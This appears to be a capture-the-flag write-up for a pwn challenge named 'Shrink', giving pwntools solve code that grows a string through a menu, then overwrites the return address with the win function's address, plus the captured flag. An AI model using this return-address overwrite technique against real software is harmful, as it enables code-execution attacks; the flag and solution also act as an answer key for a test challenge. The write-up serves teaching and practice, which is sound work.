Skip to main content

Shrink

Challenge

Menu-driven overflow after repeated string growth; overwrite return address with win.

Solution

Key solve code:

def add_exclamation():
	p.recvuntil(b"4. Exit\n")
	p.sendline(b"3")

def change_name(name):
	p.recvuntil(b"4. Exit\n")
	p.sendline(b"2")
	p.recvuntil(b"new name: \n")
	p.sendline(name)

for _ in range(40):
	add_exclamation()

change_name(b"asdf")
change_name(b"A" * 56 + p64(elf.sym["_Z3winv"]))
p.sendline(b"4")

Flag

gigem{https://i.redd.it/sayk4pi4ood81.png}

Challenge
Solution
Flag